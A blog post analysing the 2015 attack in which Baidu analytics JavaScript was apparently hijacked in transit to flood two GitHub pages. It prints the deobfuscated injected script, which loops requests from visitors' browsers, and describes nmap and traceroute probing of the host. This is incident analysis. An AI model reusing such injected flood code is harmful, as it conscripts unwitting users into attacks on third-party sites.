Baidu’s traffic hijacked to DDoS GitHub.com [Updated]

UPDATE:

Netresec has done a really professional analysis on this matter. Too bad the attack stopped before I could capture some packets.
Now here is their finding:

http://www.netresec.com/?page=Blog&month=2015-03&post=China%27s-Man-on-the-Side-Attack-on-GitHub

Robert Graham from Errata Security also pin pointed the exact location where the attack took place using HTTP traceroute:

http://blog.erratasec.com/2015/04/pin-pointing-chinas-attack-against.html

You can do the same by modifying this tool which was used to locate the nodes of GFW:

https://github.com/mothran/mongol

 

 

As a Chinese living outside of China, I frequently visit Chinese websites, many of which use advertising and visitor tracking provided by Baidu, the largest search engine available in China. As I was browsing one of the most popular Chinese infosec community in China, zone.wooyun.org, at around 12:00pm GMT+8, my browser suddenly started to pop up JS alerts every 5 seconds.
Alert

My first thought was someone naughty XSSed the page, so I opened developer tools to find the source of the XSS.

JS event

Almost instantly I saw it was keep trying to load these two URLs: github.com/greatefire/ and github.com/cn-nytimes/ every a few seconds.

After some digging I located the source of the JS that did it, a piece of code under each page:

</pre>
<div style="display: none;"><script type="text/javascript">// <![CDATA[
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3F3faf3a47435cc512f3b86dc12af100d0' type='text/javascript'%3E%3C/script%3E"));
// ]]></script></div>
<pre>

The Baidu user tracking code, just like Google Analytics code that you would see on other websites.

All the function call was triggered from this file, so I opened http://hm.baidu.com/h.js in browser:

code

Seems it has been obfuscated. No custom JS bytecode VM? You call that JS obfuscation? …piece of a cake:

document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js">// <![CDATA[

\x3c/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;

function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;

function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}

function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}

function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);

Every 2 seconds, as you can see from setTimeout(“r_send2()”, 2E3) , it will try to load an random URL from

["https://github.com/greatfire/", "https://github.com/cn-nytimes/"]

I asked some of my friends in China to open the js file from Baidu.com, it was blank as it supposed to, to display a blank page if the request does not have a HTTP referrer.

Apparently many other people have discovered it too:

1

2

Appears to be HTTP hijacking.

I scanned hm.baidu.com with NMAP, only two ports were opened, 80 and 443
SSL connection was not hijacked:
s5

nmap

Traceroute:
mtr

It is also worth noting that on port 80, web server was lighttpd, but on port 443 it was Apache

What is happening here is pretty clear now:
A certain device at the border of China’s inner network and the Internet has hijacked the HTTP connections went into China, replaced some javascript files from Baidu with malicious ones that would load

["https://github.com/greatfire/", "https://github.com/cn-nytimes/"]

every two seconds.

OK that explained something but not everything, why it started to alert user with

Warning: malicious javascript detected on this domain

When I opened one of the urls being DDoSed above, the content was:

alert("WARNING: malicious javascript detected on this domain")

Very clever, use alert to block code execution to prevent it being called in a loop. Maybe it was done by Github or Greatfire themselves, who knows.

Conclusion:

Remember this?

http://furbo.org/2015/01/22/fear-china/

In other words, even people outside China are being weaponized to target things the Chinese government does not like, for example, freedom of speech.

EDIT:

By the time I posted this article, the attack has stopped has evolved by using other javascript files from Sina blog.
// ]]>

  1. Are there any ways to solve this problem yet? I’m getting really annoyed by the constant pop-ups :sad:

  2. Hi, nice to see a different perspective on this github attack. I have a question for you. ES File explorer for Android,(playstore app) uses Baidu analytics,I confirmed this with a packet capture and analysis at cloudshark.com Could these connections be used by Great Cannon to either perform another ddos attack,or even have malware delivered to a device that had connected to servers in China. I read the report by the Toronto group. The reason I ask,is that there are many apps by Chinese developers,such as browsers,security apps,and other productivity apps,that have too many permissions in most cases. I believe most of these are calling home for a variety of reasons,but Baidu analytics for sure. Any information would be appreciated. Thanks.

  3. 不好意思,QQ群查询不能访问了,不知什么时候可以恢复?

Leave a Comment



Verify Code   If you cannot see the CheckCode image,please refresh the page again!